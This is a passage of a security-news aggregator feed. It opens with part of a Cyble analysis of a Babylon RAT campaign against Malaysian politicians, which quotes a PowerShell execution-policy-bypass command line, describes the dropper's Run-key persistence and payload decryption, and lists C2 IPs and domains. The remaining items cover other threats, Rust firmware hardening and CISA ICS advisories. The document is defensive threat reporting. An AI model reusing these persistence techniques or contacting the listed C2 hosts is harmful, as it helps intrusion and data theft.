-executionpolicy bypass -File ""PANDUAN_PENGGUNA_MyKHAS.ps1” Following this, the PowerShell script (.ps1) opens a decoy PDF file using the ""Invoke-Item"" command. It then copies the malicious executable, ''controller.exe,'' into the Windows “%appdata%” directory via the “Copy-Item” command. To ensure the executable runs automatically at system startup, the script adds a startup entry in the registry under “HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run” with the name “USBController.” Lastly, the script launches “controller.exe” from the current directory using the ""Invoke-Expression"" command. Later, the PowerShell script (.ps1) opens the decoy PDF file using the “Invoke-Item” command. It then copies the malicious executable, ''controller.exe,'' to the “%appdata%” directory using “Copy-Item”. The script creates a startup entry in the registry under “HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run” with the name “USBController” ensuring “controller.exe” is executed automatically on system startup. Finally, the script starts “controller.exe” from the %appdata% directory using Invoke-Expression. The below figure shows the content of the malicious PowerShell script. The executable “controller.exe” has been identified as wrapper for Babylon RAT, an open-source remote access tool (RAT) commonly used by TAs for cyber espionage and data exfiltration. Figure 6 - PowerShell script Payload analysis During our analysis, we discovered that the file “Controller.exe” contains a significant data overlay, approximately 300MB in size, which appears to be intentionally designed to evade detection by security products. This file employs ""Dynamic API Resolution"" using “GetModuleHandle” and “GetProcAddress”. This technique allows the wrapper to dynamically call Win32 cryptographic APIs to decrypt its embedded encrypted content. Specifically, it uses the below shown base data value to generate a 256-bit key via the “CryptDeriveKey” function, which is subsequently used with the AES-256 algorithm in the “CryptDecrypt” API to decrypt the payload. Figure 7 – BaseData Value for CryptDeriveKey to create key for AES_256 Figure 8 - Decrypted payload The decrypted payload, is again packed with an UPX packer, further the execution is transferred to the decrypted payload using the “CreateThread” windows API as shown in below figure Figure 9 - Thread Creation Babylon Rat The decrypted payload is a Babylon RAT, which is an open-source remote access tool (RAT) widely used by cybercriminals for espionage and data theft. It allows TAs to take full control of a victim''s machine remotely, enabling actions like file manipulation, process management, and command execution. The RAT includes keylogging features, capturing user keystrokes to steal sensitive information like passwords. It also supports clipboard monitoring and can take screenshots of the victim’s desktop. Persistence mechanisms allow it to survive reboots by modifying system settings or registry keys. Babylon RAT communicates with a command-and-control (C2) server for further instructions, data exfiltration, and payload delivery. It is often used for long-term surveillance and data harvesting in targeted cyberattacks. The below Figure shows the Babylon RAT string present in the process memory. Figure 10 - Babylon Rat C&C Communication: The Babylon RAT samples observed in this campaign connect to command-and-control (C&C) servers at 149.28.19[.]207 and 64.176.65[.]152 over port 443, enabling TAs to gain control of the infected machine and exfiltrate sensitive data. While the identity of the TA behind this campaign remains unknown, intelligence from the Cyble Vision Platform indicates that these Malaysian entities were also targeted using Quasar RAT in the past. Figure 11 –IP Address 64.176.65[.]152 Details in Cyble Vision Conclusion The sophisticated cyber-attack targeting political figures and government officials in Malaysia showcases the heightened interest and advanced techniques of the TAs. The ongoing campaign, involving malicious ISO files, highlights the severity of the threat and the persistent nature of such attacks. The use of Babylon RAT, an open-source Remote Access Trojan, illustrates the capability of these TAs to gain unauthorized control and exfiltrate sensitive data. Additionally, the recurrence of targeting Malaysian entities with similar tools, such as Quasar RAT, emphasizes the need for enhanced security measures and vigilance to defend against these evolving cyber threats. Recommendations Implement advanced email filtering solutions to detect and block malicious attachments, such as ISO files, and prevent them from reaching end users. Deploy and regularly update endpoint security solutions, including antivirus and anti-malware software, to detect and mitigate threats like Babylon RAT. Implement continuous network monitoring and anomaly detection to identify and respond to unusual activities or unauthorized connections, especially those involving command-and-control servers. Conduct comprehensive security awareness training for political figures, and government officials to recognize and avoid phishing attempts and malicious files. Ensure that all systems and software are kept up to date with the latest security patches to reduce vulnerabilities that could be exploited by threat actors. MITRE ATT&CK® Techniques Tactic Technique Procedure Execution (TA0002) User Execution: Malicious File (T1204.002) The ISO file contains an LNK file disguised as a PDF. When executed, it runs a PowerShell script to initiate the attack. Execution (TA0002) Command and Scripting Interpreter: PowerShell (T1059.001) The LNK file triggers a PowerShell script to execute the payload and create persistence. Persistence (TA0003) Boot or Logon Autostart Execution: Registry Run Keys/Startup Folder (T1547.001) The PowerShell script creates a startup entry in the registry Defense Evasion (TA0005) Dynamic API Resolution (T1027.007) Cryptographic APIs resolved during runtime to evade IAT based detection Defense Evasion (TA0005) LNK Icon Smuggling (T1027.012) LNK file disguised with a PDF icon Defense Evasion (TA0005) Encrypted/Encoded File (T1027.013) The Babylon is encrypted with AES-256 encryption to evade detection by security tools. Credential Access (TA0006) Credentials from Password Stores: Credentials from Web Browsers (T1555.003) Babylon RAT can extract passwords from web browsers Discovery (TA0007) System Information Discovery (T1082) Babylon RAT collects system information from the victim''s machine. Collection (TA0009) Clipboard Data (T1115) Babylon RAT monitors and logs clipboard data, storing it for later exfiltration. Collection (TA0009) Input Capture: Keylogging (T1056.001) The RAT captures keystrokes using the SetWindowsHookEx win32 API Command and Control (TA0011) Application Layer Protocol: Web Protocols (T1071.001) BabylonRAT communicates with the TAs C2 server over web protocols. Exfiltration (TA0010) Exfiltration Over C2 Channel (T1041) The TA exfiltrates collected data through the established C2 channel. Indicators Of Compromise Indicators Indicator Type Description 54a52310ade00eca0abb8ba32f4cacc42deb69b6e1f07309e44df2213bf2569c SHA-256 SalahLaku_MARA.iso d9f0268cbaa1ae45dfa755adab9dda2d8bdff3c8bf8a00d23bbc6894c28e225f SHA-256 PANDUAN_PENGGUNA_MyKHAS.iso 8e6717e88ab6bb4a96e465dc0e9db3cf371e8e75af29e4c3ebc175707702b3b6 SHA-256 LimKitSiang_teks_penuh.iso cf2b8c735f6acc0310ec76607b5c37ef994c96c74442373686e1f3a141c7a892 SHA-256 Salahlaku_Sektor_Keusahawanan_MARA.lnk b9dddf801db527b3895409443fadeeced176b3ccac220395f700e91b151076b0 SHA-256 PANDUAN_PENGGUNA_MyKHAS.lnk 401a524c5a446107547475d27f9acd548182eac06294245dc43313b47ffa0e5c SHA-256 Salahlaku_Sektor_Keusahawanan_MARA.ps1 f21ae37cb39658a62c9aaa945eb4dc2b33aebe4afeb5374d36328589a53e0982 SHA-256 controller.exe 77e22b511cd236cae46f55e50858aea174021a1cd431beaa5e7839a9d062e4c7 SHA-256 PDFview.exe b348935e378b57001e6b41d96ae498ca00dd9fb296115a4e036dad8ccc7155d3 SHA-256 PANDUAN_PENGGUNA_MyKHAS.ps1 2a5a1ae773c59f18cceada37c4d78427ff18bd9a8c0ceb584c0cf997f6ac36b0 SHA-256 Kit_Siang_Bimbang_Gelombang_Hijau.ps1 f30901bd966b8c4803ffd517347167b4bba2c1b85cc7b5bcbe08791e249eb86b SHA-256 Kit_Siang_Bimbang_Gelombang_Hijau.lnk 64.176.65.152 IP C&C workhub-microsoft-team.com domain C&C 149.28.19.207 IP C&C fund.sekretariatparti.org domain C&C The post The Intricate Babylon RAT Campaign Targets Malaysian Politicians, Government appeared first on Cyble.
by CYBLE
2024-09-04 13:09:00
Worried about the YubiKey 5 vulnerability? Here's why I''m notI''m a big fan of YubiKeys and the fact that some of them are vulnerable to being cloned doesn''t change that. Let me explain.
by ZDNET Security
2024-09-04 13:00:00
CEO's Arrest Will Likely Not Dampen Cybercriminal Interest in TelegramIn recent years, the platform has become a go-to tool for executing almost all conceivable cybercriminal activity.
by Dark Reading
2024-09-04 13:00:00
CyberheistNews Vol 14 #36 KnowBe4 Expands Children's Interactive Cybersecurity Activity Kit for 2024/2025 School Year
by KnowBe4
2024-09-04 12:02:00
Deploying Rust in Existing Firmware CodebasesPosted by Ivan Lozano and Dominik Maier, Android Team Android''s use of safe-by-design principles drives our adoption of memory-safe languages like Rust, making exploitation of the OS increasingly difficult with every release. To provide a secure foundation, we’re extending hardening and the use of memory-safe languages to low-level firmware (including in Trusty apps).In this blog post, we''ll show you how to gradually introduce Rust into your existing firmware, prioritizing new code and the most security-critical code. You''ll see how easy it is to boost security with drop-in Rust replacements, and we''ll even demonstrate how the Rust toolchain can handle specialized bare-metal targets.Drop-in Rust replacements for C code are not a novel idea and have been used in other cases, such as librsvg’s adoption of Rust which involved replacing C functions with Rust functions in-place. We seek to demonstrate that this approach is viable for firmware, providing a path to memory-safety in an efficient and effective manner.Memory Safety for FirmwareFirmware serves as the interface between hardware and higher-level software. Due to the lack of software security mechanisms that are standard in higher-level software, vulnerabilities in firmware code can be dangerously exploited by malicious actors. Modern phones contain many coprocessors responsible for handling various operations, and each of these run their own firmware. Often, firmware consists of large legacy code bases written in memory-unsafe languages such as C or C++. Memory unsafety is the leading cause of vulnerabilities in Android, Chrome, and many other code bases.Rust provides a memory-safe alternative to C and C++ with comparable performance and code size. Additionally it supports interoperability with C with no overhead. The Android team has discussed Rust for bare-metal firmware previously, and has developed training specifically for this domain.Incremental Rust AdoptionOur incremental approach focusing on replacing new and highest risk existing code (for example, code which processes external untrusted input) can provide maximum security benefits with the least amount of effort. Simply writing any new code in Rust reduces the number of new vulnerabilities and over time can lead to a reduction in the number of outstanding vulnerabilities.You can replace existing C functionality by writing a thin Rust shim that translates between an existing Rust API and the C API the codebase expects. The C API is replicated and exported by the shim for the existing codebase to link against. The shim serves as a wrapper around the Rust library API, bridging the existing C API and the Rust API. This is a common approach when rewriting or replacing existing libraries with a Rust alternative.Challenges and ConsiderationsThere are several challenges you need to consider before introducing Rust to your firmware codebase. In the following section we address the general state of no_std Rust (that is, bare-metal Rust code), how to find the right off-the-shelf crate (a rust library), porting an std crate to no_std, using Bindgen to produce FFI bindings, how to approach allocators and panics, and how to set up your toolchain.The Rust Standard Library and Bare-Metal EnvironmentsRust''s standard library consists of three crates: core, alloc, and std. The core crate is always available. The alloc crate requires an allocator for its functionality. The std crate assumes a full-blown operating system and is commonly not supported in bare-metal environments. A third-party crate indicates it doesn’t rely on std through the crate-level #![no_std] attribute. This crate is said to be no_std compatible. The rest of the blog will focus on these.Choosing a Component to ReplaceWhen choosing a component to replace, focus on self-contained components with robust testing. Ideally, the components functionality can be provided by an open-source implementation readily available which supports bare-metal environments.Parsers which handle standard and commonly used data formats or protocols (such as, XML or DNS) are good initial candidates. This ensures the initial effort focuses on the challenges of integrating Rust with the existing code base and build system rather than the particulars of a complex component and simplifies testing. This approach eases introducing more Rust later on.Choosing a Pre-Existing Crate (Rust Library)Picking the right open-source crate (Rust library) to replace the chosen component is crucial. Things to consider are:Is the crate well maintained, for example, are open issues being addressed and does it use recent crate versions?How widely used is the crate? This may be used as a quality signal, but also important to consider in the context of using crates later on which may depend on it.Does the crate have acceptable documentation?Does it have acceptable test coverage?Additionally, the crate should ideally be no_std compatible, meaning the standard library is either unused or can be disabled. While a wide range of no_std compatible crates exist, others do not yet support this mode of operation – in those cases, see the next section on converting a std library to no_std.By convention, crates which optionally support no_std will provide an std feature to indicate whether the standard library should be used. Similarly, the alloc feature usually indicates using an allocator is optional.Note: Even when a library declares #![no_std] in its source, there is no guarantee that its dependencies don’t depend on std. We recommend looking through the dependency tree to ensure that all dependencies support no_std, or test whether the library compiles for a no_std target. The only way to know is currently by trying to compile the crate for a bare-metal target.For example, one approach is to run cargo check with a bare-metal toolchain provided through rustup:$ rustup target add aarch64-unknown-none$ cargo check --target aarch64-unknown-none --no-default-featuresPorting a std Library to no_stdIf a library does not support no_std, it might still be possible to port it to a bare-metal environment – especially file format parsers and other OS agnostic workloads. Higher-level functionality such as file handling, threading, and async code may present more of a challenge. In those cases, such functionality can be hidden behind feature flags to still provide the core functionality in a no_std build.To port a std crate to no_std (core+alloc):In the cargo.toml file, add a std feature, then add this std feature to the default featuresAdd the following lines to the top of the lib.rs:#![no_std]#[cfg(feature = ""std"")]extern crate std;extern crate alloc;Then, iteratively fix all occurring compiler errors as follows:Move any use directives from std to either core or alloc.Add use directives for all types that would otherwise automatically be imported by the std prelude, such as alloc::vec::Vec and alloc::string::String.Hide anything that doesn''t exist in core or alloc and cannot otherwise be supported in the no_std build (such as file system accesses) behind a #[cfg(feature = ""std"")] guard.Anything that needs to interact with the embedded environment may need to be explicitly handled, such as functions for I/O. These likely need to be behind a #[cfg(not(feature = ""std""))] guard.Disable std for all dependencies (that is, change their definitions in Cargo.toml, if using Cargo).This needs to be repeated for all dependencies within the crate dependency tree that do not support no_std yet.Custom Target ArchitecturesThere are a number of officially supported targets by the Rust compiler, however, many bare-metal targets are missing from that list. Thankfully, the Rust compiler lowers to LLVM IR and uses an internal copy of LLVM to lower to machine code. Thus, it can support any target architecture that LLVM supports by defining a custom target.Defining a custom target requires a toolchain built with the channel set to dev or nightly. Rust’s Embedonomicon has a wealth of information on this subject and should be referred to as the source of truth. To give a quick overview, a custom target JSON file can be constructed by finding a similar supported target and dumping the JSON representation:$ rustc --print target-list[...]armv7a-none-eabi[...]$ rustc -Z unstable-options --print target-spec-json --target armv7a-none-eabiThis will print out a target JSON that looks something like:$ rustc --print target-spec-json -Z unstable-options --target=armv7a-none-eabi{ ""abi"": ""eabi"", ""arch"": ""arm"", ""c-enum-min-bits"": 8, ""crt-objects-fallback"": ""false"", ""data-layout"": ""e-m:e-p:32:32-Fi8-i64:64-v128:64:128-a:0:32-n32-S64"", [...]}This output can provide a starting point for defining your target. Of particular note, the data-layout field is defined in the LLVM documentation.Once the target is defined, libcore and liballoc (and libstd, if applicable) must be built from source for the newly defined target. If using Cargo, building with -Z build-std accomplishes this, indicating that these libraries should be built from source for your target along with your crate module:# set build-std to the list of libraries neededcargo build -Z build-std=core,alloc --target my_target.jsonBuilding Rust With LLVM PrebuiltsIf the bare-metal architecture is not supported by the LLVM bundled internal to the Rust toolchain, a custom Rust toolchain can be produced with any LLVM prebuilts that support the target.The instructions for building a Rust toolchain can be found in detail in the Rust Compiler Developer Guide. In the config.toml, llvm-config must be set to the path of the LLVM prebuilts.You can find the latest Rust Toolchain supported by a particular version of LLVM by checking the release notes and looking for releases which bump up the minimum supported LLVM version. For example, Rust 1.76 bumped the minimum LLVM to 16 and 1.73 bumped the minimum LLVM to 15. That means with LLVM15 prebuilts, the latest Rust toolchain that can be built is 1.75.Creating a Drop-In Rust ShimTo create a drop-in replacement for the C/C++ function or API being replaced, the shim needs two things: it must provide the same API as the replaced library and it must know how to run in the firmware’s bare-metal environment.Exposing the Same APIThe first is achieved by defining a Rust FFI interface with the same function signatures.We try to keep the amount of unsafe Rust as minimal as possible by putting the actual implementation in a safe function and exposing a thin wrapper type around.For example, the FreeRTOS coreJSON example includes a JSON_Validate C function with the following signature:JSONStatus_t JSON_Validate( const char * buf, size_t max );We can write a shim in Rust between it and the memory safe serde_json crate to expose the C function signature. We try to keep the unsafe code to a minimum and call through to a safe function early:#[no_mangle]pub unsafe extern ""C"" fn JSON_Validate(buf: *const c_char, len: usize) -> JSONStatus_t { if buf.is_null() { JSONStatus::JSONNullParameter as _ } else if len == 0 { JSONStatus::JSONBadParameter as _ } else { json_validate(slice_from_raw_parts(buf as _, len).as_ref().unwrap()) as _ }}// No more unsafe code in here.fn json_validate(buf: &[u8]) -> JSONStatus { if serde_json::from_slice::<Value>(buf).is_ok() { JSONStatus::JSONSuccess } else { ILLEGAL_DOC }}Note: This is a very simple example. For a highly resource constrained target, you can avoid alloc and use serde_json_core, which has even lower overhead but requires pre-defining the JSON structure so it can be allocated on the stack.For further details on how to create an FFI interface, the Rustinomicon covers this topic extensively.Calling Back to C/C++ CodeIn order for any Rust component to be functional within a C-based firmware, it will need to call back into the C code for things such as allocations or logging. Thankfully, there are a variety of tools available which automatically generate Rust FFI bindings to C. That way, C functions can easily be invoked from Rust.The standard means of doing this is with the Bindgen tool. You can use Bindgen to parse all relevant C headers that define the functions Rust needs to call into. It''s important to invoke Bindgen with the same CFLAGS as the code in question is built with, to ensure that the bindings are generated correctly.Experimental support for producing bindings to static inline functions is also available.Hooking Up The Firmware’s Bare-Metal EnvironmentNext we need to hook up Rust panic handlers, global allocators, and critical section handlers to the existing code base. This requires producing definitions for each of these which call into the existing firmware C functions.The Rust panic handler must be defined to handle unexpected states or failed assertions. A custom panic handler can be defined via the panic_handler attribute. This is specific to the target and should, in most cases, either point to an abort function for the current task/process, or a panic function provided by the environment.If an allocator is available in the firmware and the crate relies on the alloc crate, the Rust allocator can be hooked up by defining a global allocator implementing GlobalAlloc.If the crate in question relies on concurrency, critical sections will need to be handled. Rust''s core or alloc crates do not directly provide a means for defining this, however the critical_section crate is commonly used to handle this functionality for a number of architectures, and can be extended to support more.It can be useful to hook up functions for logging as well. Simple wrappers around the firmware’s existing logging functions can expose these to Rust and be used in place of print or eprint and the like. A convenient option is to implement the Log trait.Fallible Allocations and allocRusts alloc crate normally assumes that allocations are infallible (that is, memory allocations won’t fail). However due to memory constraints this isn’t true in most bare-metal environments. Under normal circumstances Rust panics and/or aborts when an allocation fails; this may be acceptable behavior for some bare-metal environments, in which case there are no further considerations when using alloc.If there’s a clear justification or requirement for fallible allocations however, additional effort is required to ensure that either allocations can’t fail or that failures are handled. One approach is to use a crate that provides statically allocated fallible collections, such as the heapless crate, or dynamic fallible allocations like fallible_vec. Another is to exclusively use try_* methods such as Vec::try_reserve, which check if the allocation is possible.Rust is in the process of formalizing better support for fallible allocations, with an experimental allocator in nightly allowing failed allocations to be handled by the implementation. There is also the unstable cfg flag for alloc called no_global_oom_handling which removes the infallible methods, ensuring they are not used.Build OptimizationsBuilding the Rust library with LTO is necessary to optimize for code size. The existing C/C++ code base does not need to be built with LTO when passing -C lto=true to rustc. Additionally, setting -C codegen-unit=1 results in further optimizations in addition to reproducibility. If using Cargo to build, the following Cargo.toml settings are recommended to reduce the output library size:[profile.release]panic = ""abort""lto = truecodegen-units = 1strip = ""symbols""# opt-level ""z"" may produce better results in some circumstancesopt-level = ""s"" Passing the -Z remap-cwd-prefix=. flag to rustc or to Cargo via the RUSTFLAGS env var when building with Cargo to strip cwd path strings.In terms of performance, Rust demonstrates similar performance to C. The most relevant example may be the Rust binder Linux kernel driver, which found “that Rust binder has similar performance to C binder”.When linking LTO’d Rust staticlibs together with C/C++, it’s recommended to ensure a single Rust staticlib ends up in the final linkage, otherwise there may be duplicate symbol errors when linking. This may mean combining multiple Rust shims into a single static library by re-exporting them from a wrapper module.Memory Safety for Firmware, TodayUsing the process outlined in this blog post, You can begin to introduce Rust into large legacy firmware code bases immediately. Replacing security critical components with off-the-shelf open-source memory-safe implementations and developing new features in a memory safe language will lead to fewer critical vulnerabilities while also providing an improved developer experience.Special thanks to our colleagues who have supported and contributed to these efforts: Roger Piqueras Jover, Stephan Chen, Gil Cukierman, Andrew Walbran, and Erik Gilling
by Google Security Blog
2024-09-04 12:00:19
Malwarebytes review: Solid, free protection with a user-friendly interfaceMalwarebytes offers both free and premium antivirus services to help protect your device. Here''s what to know.
by ZDNET Security
2024-09-04 11:01:00
Hackers Use Fake GlobalProtect VPN Software in New WikiLoader Malware AttackA new malware campaign is spoofing Palo Alto Networks'' GlobalProtect VPN software to deliver a variant of the WikiLoader (aka WailingCrab) loader by means of a search engine optimization (SEO) campaign. The malvertising activity, observed in June 2024, is a departure from previously observed tactics wherein the malware has been propagated via traditional phishing emails, Unit 42 researchers
by The Hacker News
2024-09-04 11:00:00
Deepfake scams escalate, hitting more than half of businessesThe vast majority of corporate finance professionals, 85%, now view such scams as an “existential” threat, a Medius study found.
by Cybersecurity Dive
2024-09-04 11:00:00
Linux Ransomware Threats: How Attackers Target Linux SystemsRansomware has evolved to target Linux systems. Learn about methods for infection and how to protect your IT environments from attacks.
by ITPro Today
2024-09-04 11:00:00
Zimperium Welcomes Shashank Pathak to Our Go-to-Market Team in IndiaAs we continue to strengthen our presence in India and South Asia, we are excited to announce the appointment of Shashank Pathak to our Go-to-Market team. The post Zimperium Welcomes Shashank Pathak to Our Go-to-Market Team in India appeared first on Zimperium.
by Zimperium
2024-09-04 10:50:52
Prolific RansomHub engaged in attack spree, feds warnThe group has been among the most active threat groups of 2024, and is linked to a tool that can neutralize endpoint security.
by Cybersecurity Dive
2024-09-04 10:31:11
Microsoft is training developers on the intricacies of threat intelligenceCybercrime wonk Sherrod DeGrippo is taking Microsoft’s software developers and engineers on a journey into her world, the depths of threat intelligence.
by Cybersecurity Dive
2024-09-04 10:00:02
Mallox ransomware: in-depth analysis and evolutionIn this report, we provide an in-depth analysis of the Mallox ransomware, its evolution, ransom strategy, encryption scheme, etc.
by Securelist
2024-09-04 08:04:39
FudModule Rootkit Targets Crypto, Linked to North Korean Citrine Sleet GroupKey Takeaways A North Korean threat actor, Citrine Sleet, has been observed exploiting a zero-day vulnerability in Chromium, designated as CVE-2024-7971, to achieve Remote Code Execution (RCE). Citrine Sleet, also tracked by other security firms under the names AppleJeus, Labyrinth Chollima, UNC4736, and Hidden Cobra, is attributed to Bureau 121 of North Korea''s Reconnaissance General Bureau. The group primarily focuses on financial institutions, especially those involved with cryptocurrency, aiming for financial gain. The group''s tactics, techniques, and procedures (TTPs) have now been linked to the FudModule rootkit, which has also been associated with Diamond Sleet, another North Korean threat actor. Citrine Sleet creates fraudulent websites that mimic legitimate cryptocurrency trading platforms to distribute fake job applications or entice targets into downloading a compromised cryptocurrency wallet or trading application. The TA typically infects targets with its custom trojan malware, AppleJeus, designed to gather information necessary to take control of victims'' cryptocurrency assets. Overview The Citrine Sleet threat actor group was observed by Microsoft researchers exploiting the CVE-2024-7971 zero-day vulnerability in the V8 JavaScript and WebAssembly engine, which affects versions of Chromium prior to 128.0.6613.84. By exploiting this vulnerability, the attackers achieved remote code execution (RCE) within the sandboxed Chromium renderer process. Google has since released a patch for the vulnerability, on August 21, 2024, and users are advised to update to the latest version of Chromium to mitigate the risk. Technical Analysis The observed attack chain involved a typical browser exploit sequence, starting with targets being directed to a Citrine Sleet-controlled exploit domain, voyagorclub[.]space, through common social engineering tactics. Once the users were connected, the zero-day RCE exploit for CVE-2024-7971 was deployed, allowing the attackers to download and load shellcode containing a Windows sandbox escape exploit and the FudModule rootkit into memory. FudModule is an advanced rootkit malware designed to target kernel access while avoiding detection. Threat actors have been seen using the FudModule data-only rootkit to gain admin-to-kernel access on Windows-based systems, enabling read/write primitive operations and conducting Direct Kernel Object Manipulation (DKOM). The attack chain seen in Citrine Sleet''s zero-day exploit of CVE-2024-7971 closely mirrors the chain observed by Avast, which involves a variant of FudModule known as ""FudModule 2.0."" This variant includes malicious loaders and a late-stage remote access trojan (RAT). The research identified the previously unknown Kaolin RAT as the malware responsible for deploying the FudModule rootkit on targeted devices. Conclusion and Recommendations CVE-2024-7971 is the third vulnerability this year that North Korean threat actors have exploited to deploy the FudModule rootkit, following CVE-2024-21338 and CVE-2024-38193. To address zero-day exploits effectively, it is crucial not only to keep systems updated but also to use security solutions that offer comprehensive visibility across the cyberattack chain to detect and block attacker tools and malicious activities after exploitation. To mitigate the risks posed by Citrine Sleet and similar threats, the following best practices are recommended: Activate the automatic software update function on your computer, mobile device, and any other linked devices when feasible and practical. Employ a trusted antivirus solution and internet security software suite on all connected devices, such as your PC, laptop, and mobile phone. Conduct consistent vulnerability assessments to maintain proactive security. Always use multi-factor authentication on accounts to lessen the risk of takeover. The post FudModule Rootkit Targets Crypto, Linked to North Korean Citrine Sleet Group appeared first on Cyble.
by CYBLE
2024-09-04 07:57:00
Why SMEs need to change their perspective on cybersecurityA recent report from the World Economic Forum explored how small and medium-sized enterprises (SMEs) can turn cybersecurity risk into an opportunity. We recently wrote about why securing small businesses is good for everyone – protecting third party providers at every level of a supply chain in order to enable a better overall security posture for every organisation in that chain. And we’re not alone in renewing our focus on the importance of security for SMEs; because as Akhilesh Tuteja (Global Cyber Security Leader at KPMG) noted in that World Economic Forum report, “the size of an enterprise no longer dictates its vulnerability to cyber threats.” Threat actors are targeting smaller businesses, identifying them as weak links that offer easy entry points into a network. What can SMEs do to improve their security and become small but strong links in global supply chains? SMEs must see cybersecurity as a business problem – not just a tech problem Small enterprises don’t have the same access to resources that larger organisations have. And because of this, they tend to focus on what’s immediately, obviously important (namely, sales and profit margins), and silo other aspects of business operations into small pots that sit much lower on their list of priorities. Cybersecurity is one of those aspects that gets compartmentalised and often neglected. Technical security systems are set up, and then forgotten about – with SMEs less likely to integrate security practices across their operations in an ongoing, dynamic way. This is a mistake. SMEs must change their perspective and start thinking about cybersecurity not as a technology problem, but as a business problem. “While understanding the technology that powers business is very important, understanding the risks it brings to business is far more important,” wrote Tuteja. “Unlike larger enterprises that can apply a higher degree of control across the enterprise, SMEs must identify areas of relevance and create a cyber strategy for different units, data types and systems. They should also explore more mature technologies, such as cloud computing, instead of spending time trying to build, manage and maintain their own systems.” When you integrate cybersecurity into your business strategy it creates opportunities for growth Instead of seeing cybersecurity as a risk alone, Tuteja urged small and medium enterprises to see it as an opportunity – with a good security strategy at the heart of an overall growth strategy. Why? Because customers, both in B2C and B2B markets, value trust. And they’re more likely to trust a small business if it can clearly demonstrate and explain the security protocols and practices it uses to keep customer information safe. When we interviewed Abeer Khedr (CISO at National Bank of Egypt) for the BHMEA blog, she said that the inequity between larger cyber resilient organisations, and smaller less resilient ones, will continue to increase. “This is a cause of concern because the less resilient companies could be our suppliers, our customers; it’s one ecosystem. This should drive our efforts in 2024 to increase awareness and support these companies on how to apply security measures and develop incident response capabilities to increase their cyber resilience.” Cybersecurity can’t be an afterthought for SMEs – and the cybersecurity sector needs to offer opportunities for small business leaders to understand the inextricable nature of business strategy and security, and develop security practices that facilitate high growth with low risk. P.S. - Mark your calendars for the return of Black Hat MEA in November 2024. Want to be a part of the action? Register now!
by HACKLIDO
2024-09-04 07:41:52
CISA Warns of Critical ICS Vulnerabilities in Rockwell and Delta ElectronicsKey Takeaways CISA Alert: CISA warns of critical ICS vulnerabilities in Rockwell Automation and Delta Electronics products. ThinManager ThinServer: Flaws in Rockwell Automation’s ThinManager ThinServer (versions 11.1.0 to 13.2.1) could allow system-level code execution. Affected sector: Manufacturing. Delta DTN Soft: Vulnerability in Delta’s DTN Soft (version 2.0.1 and prior) enables remote code execution. Update to version 2.1. Affected sector: Energy. FactoryTalk View SE: A flaw in Rockwell Automation’s FactoryTalk View SE 13.0 allows unauthorized file modifications. Affected sectors: Chemical, Energy, and others. Mitigation: CISA advises minimizing ICS exposure, securing remote access, updating software, and implementing layered security measures. Overview On August 29, the Cybersecurity and Infrastructure Security Agency (CISA) released three advisories to warn users and administrators of several critical vulnerabilities affecting industrial control systems (ICS) from prominent vendors. Advisory ICSA-24-242-01 address vulnerabilities in Rockwell Automation ThinManager ThinServer. ICSA-24-242-02 covers a vulnerability in Delta Electronics DTN Soft. ICSA-24-226-06 advises users about a vulnerability in Rockwell Automation FactoryTalk View Site Edition (Update A). Cyble’s ICS vulnerabilities report last week looked at additional vulnerabilities in Rockwell and other ICS products, plus general recommendations for controlling risk in ICS networks. Rockwell Automation ThinManager ThinServer Vulnerabilities The first set of vulnerabilities, disclosed in ICSA-24-242-01, affects multiple versions of Rockwell Automation''s ThinManager ThinServer software, a client management tool. The flaws, which include improper privilege management, incorrect permission assignment, and improper input validation, could allow attackers to read arbitrary files and execute code with system-level privileges. The affected versions of ThinManager ThinServer range from 11.1.0 to 13.2.1. CISA has assigned three CVE identifiers to these flaws: CVE-2024-7986, CVE-2024-7987, and CVE-2024-7988. The CVSS v4 scores for these vulnerabilities range from 6.8 to 9.3, indicating a high-to-critical level of risk. Critical Infrastructure Sector Impacted: Manufacturing. Delta Electronics DTN Soft Vulnerability The second advisory, ICSA-24-242-02, focuses on a vulnerability in Delta Electronics'' DTN Soft temperature control software. The flaw, a deserialization of untrusted data issue (CWE-502), could allow an attacker to achieve remote code execution. The vulnerability affects DTN Soft version 2.0.1 and prior. CISA has assigned CVE-2024-8255 to this flaw, with a CVSS v4 score of 8.4. Delta Electronics recommends updating to the latest version, 2.1, to mitigate this vulnerability. Critical Infrastructure Sector Impacted: Energy. Rockwell Automation FactoryTalk View Site Edition Vulnerability The third advisory, ICSA-24-226-06, covers a vulnerability in Rockwell Automation''s FactoryTalk View Site Edition, an HMI application. The flaw, an incorrect permission assignment for a critical resource (CWE-732), could allow any user to edit or replace files executed with elevated permissions. The affected version is FactoryTalk View SE 13.0. CISA has assigned CVE-2024-7513 to this vulnerability, with a CVSS v4 score of 8.5. Rockwell Automation recommends updating to a newer version of FactoryTalk to mitigate this vulnerability. Critical Infrastructure Sector Impacted: Chemical; Commercial Facilities; Energy; Government Facilities; Manufacturing; Water and Wastewater Systems. CISA Mitigation Advice Based on the CISA advisories for the three industrial control system (ICS) vulnerabilities, the following general recommendations and mitigations are provided: 1. Minimize Network Exposure: * Ensure that ICS devices and systems are not accessible from the internet. * Limit access to ICS devices and systems to only those who need it. * Use firewalls and other network segmentation techniques to isolate ICS networks from business networks. 2. Implement Secure Remote Access Methods: * Use Virtual Private Networks (VPNs) to establish secure remote connections. * Regularly update VPN software and configurations to ensure they are secure. * Consider using other secure remote access methods, such as SSH or HTTPS. 3. Perform Regular Software Updates: * Regularly update ICS software to the latest versions to ensure you have the latest security patches and fixes. * Use automated update mechanisms and monitoring to stay up-to-date. 4. Implement Security Best Practices: * Use strong passwords and password policies to prevent unauthorized access. * Implement access controls, such as role-based access control (RBAC) and least privilege access. * Regularly audit and monitor ICS systems for suspicious activity. 5. Perform Impact Analysis and Risk Assessment: * Regularly assess the potential impact of potential security incidents on your ICS systems. * Develop and implement incident response plans to mitigate the effects of a security incident. 6. Use Secure Protocols and Communications: * Use secure communication protocols, such as HTTPS and SSH, to protect data in transit. * Regularly update and patch communication protocols to ensure they are secure. 7. Implement Defense-in-Depth Strategies: * Implement multiple layers of security controls to prevent and detect security incidents. * Use a combination of technical and procedural controls to protect ICS systems. 8. Monitor for Suspicious Activity: * Regularly monitor ICS systems and networks for suspicious activity. * Implement intrusion detection and prevention systems to detect and prevent security incidents. The post CISA Warns of Critical ICS Vulnerabilities in Rockwell and Delta Electronics appeared first on Cyble.
by CYBLE
2024-09-04 05:00:00
